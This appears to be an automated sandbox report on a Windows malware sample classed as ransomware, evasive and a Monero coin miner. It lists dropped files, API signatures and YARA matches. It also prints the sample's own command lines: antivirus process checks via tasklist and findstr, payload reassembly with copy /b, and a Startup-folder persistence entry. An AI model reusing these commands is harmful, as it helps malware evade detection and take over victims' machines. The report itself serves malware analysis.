              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Writes many files with high entropy
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Americans entropy: 7.99760011473Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Satin entropy: 7.99764862118Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Rid entropy: 7.9977091016Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Eagle entropy: 7.99799114247Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Matching entropy: 7.99710399078Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Eugene entropy: 7.99803047909Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Smithsonian entropy: 7.99798906004Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Exhibits entropy: 7.99744911231Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Psychiatry entropy: 7.99633350563Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Through entropy: 7.99745463306Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Dealing entropy: 7.99815989653Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Carlo entropy: 7.99711927339Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Hotel entropy: 7.99835032646Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Landscape entropy: 7.99751935648Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Wendy entropy: 7.99809069172Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Expert entropy: 7.99780337689Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Turns entropy: 7.99807412881Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Holdem entropy: 7.99752904365Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Ai entropy: 7.99764618877Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Households entropy: 7.99708688405Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Guy entropy: 7.99699953217Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Result entropy: 7.99746905943Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Elliott entropy: 7.99808822812Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Norway entropy: 7.99778041078Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Exempt entropy: 7.99612802037Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Blvd entropy: 7.99621538932Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Jungle entropy: 7.99756807934Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Biodiversity entropy: 7.99816036628Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Chan entropy: 7.99708921533Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Typical entropy: 7.99755405965Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Def entropy: 7.99714947873Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Ebooks entropy: 7.99790460139Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Odds entropy: 7.99741776079Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Peeing entropy: 7.99746302181Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Innocent entropy: 7.99812179691Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Sucking entropy: 7.99806777596Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Resolutions entropy: 7.99730244217Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Delaware entropy: 7.99692887592Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Tm entropy: 7.99791944878Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Actual entropy: 7.99741011645Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Drums entropy: 7.99729494549Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Lambda entropy: 7.99792392141Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Same entropy: 7.99747556Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Games entropy: 7.99745741408Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Jpg entropy: 7.99792471662Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Individuals entropy: 7.99688013161Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Nervous entropy: 7.99786086382Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Seafood entropy: 7.99764350559Jump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\29442\l entropy: 7.99994417377Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comFile created: C:\Users\user\AppData\Local\CyberSphere Dynamics\M entropy: 7.99994417377Jump to dropped file

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA21394 NtAlpcCreatePortSection,17_2_000002453CA21394
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA91394 NtQueryInformationByName,21_2_0000014D5CA91394
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\DownReceptorJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ComfortSickJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\IdeasAppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\CentralAvoidingJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\JoiningMazdaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\UruguayNorthernJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\MozambiqueAppropriateJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\TeddySecretariatJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\OrganDiscretionJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\VatBukkakeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\KeyboardsTwinJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040737E0_2_0040737E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406EFE0_2_00406EFE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004079A20_2_004079A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004049A80_2_004049A8
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA24F1017_2_000002453CA24F10
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA2E6F017_2_000002453CA2E6F0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA2B55017_2_000002453CA2B550
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA2553017_2_000002453CA25530
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA132BB017_2_00007FF7AA132BB0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA136C7417_2_00007FF7AA136C74
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA188CB017_2_00007FF7AA188CB0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10095017_2_00007FF7AA100950
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0FB9B017_2_00007FF7AA0FB9B0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10EAA817_2_00007FF7AA10EAA8
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1A1F4017_2_00007FF7AA1A1F40
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA122F6C17_2_00007FF7AA122F6C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11BFC017_2_00007FF7AA11BFC0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10203B17_2_00007FF7AA10203B
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10F07017_2_00007FF7AA10F070
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11BD4417_2_00007FF7AA11BD44
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA103D7017_2_00007FF7AA103D70
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA127DFC17_2_00007FF7AA127DFC
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA19AE1017_2_00007FF7AA19AE10
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0FAEC017_2_00007FF7AA0FAEC0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA102EE017_2_00007FF7AA102EE0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA12936017_2_00007FF7AA129360
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11436417_2_00007FF7AA114364
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F24D417_2_00007FF7AA0F24D4
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11549C17_2_00007FF7AA11549C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA13512C17_2_00007FF7AA13512C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA19C28417_2_00007FF7AA19C284
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11C28C17_2_00007FF7AA11C28C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10626017_2_00007FF7AA106260
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA13229017_2_00007FF7AA132290
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA12827017_2_00007FF7AA128270
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F879017_2_00007FF7AA0F8790
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA11F76017_2_00007FF7AA11F760
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA10182017_2_00007FF7AA101820
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F282017_2_00007FF7AA0F2820
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA0F452817_2_00007FF7AA0F4528
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1215E017_2_00007FF7AA1215E0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA12A65017_2_00007FF7AA12A650
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA13668017_2_00007FF7AA136680
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1316D017_2_00007FF7AA1316D0
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1276EC17_2_00007FF7AA1276EC
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75203936020_2_00007FF752039360
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202436420_2_00007FF752024364
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202549C20_2_00007FF75202549C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520024D420_2_00007FF7520024D4
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75204512C20_2_00007FF75204512C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75203827020_2_00007FF752038270
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201626020_2_00007FF752016260
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202C28C20_2_00007FF75202C28C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75204229020_2_00007FF752042290
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520AC28420_2_00007FF7520AC284
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202F76020_2_00007FF75202F760
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75200879020_2_00007FF752008790
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75200282020_2_00007FF752002820
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201182020_2_00007FF752011820
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75200452820_2_00007FF752004528
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520315E020_2_00007FF7520315E0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75203A65020_2_00007FF75203A650
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75204668020_2_00007FF752046680
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520416D020_2_00007FF7520416D0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520376EC20_2_00007FF7520376EC
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752042BB020_2_00007FF752042BB0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752046C7420_2_00007FF752046C74
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752098CB020_2_00007FF752098CB0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201095020_2_00007FF752010950
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75200B9B020_2_00007FF75200B9B0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201EAA820_2_00007FF75201EAA8
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520B1F4020_2_00007FF7520B1F40
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752032F6C20_2_00007FF752032F6C
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202BFC020_2_00007FF75202BFC0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201203B20_2_00007FF75201203B
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75201F07020_2_00007FF75201F070
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75202BD4420_2_00007FF75202BD44
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752013D7020_2_00007FF752013D70
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520AAE1020_2_00007FF7520AAE10
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752037DFC20_2_00007FF752037DFC
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF75200AEC020_2_00007FF75200AEC0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752012EE020_2_00007FF752012EE0
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA9B55021_2_0000014D5CA9B550
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA9553021_2_0000014D5CA95530
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA94F1021_2_0000014D5CA94F10
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA9E6F021_2_0000014D5CA9E6F0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 004062CF appears 58 times
              Source: file.exeStatic PE information: invalid certificate
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: classification engineClassification label: mal100.rans.expl.evad.mine.winEXE@38/58@3/1
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA174124 GetLastError,FormatMessageW,17_2_00007FF7AA174124
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA16C46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,17_2_00007FF7AA16C46C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA17368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,17_2_00007FF7AA17368C
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comFile created: C:\Users\user\AppData\Local\CyberSphere DynamicsJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsgBEEE.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\explorer.exe
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Windows\explorer.exe
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\explorer.exeJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Windows\explorer.exeJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com l
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"
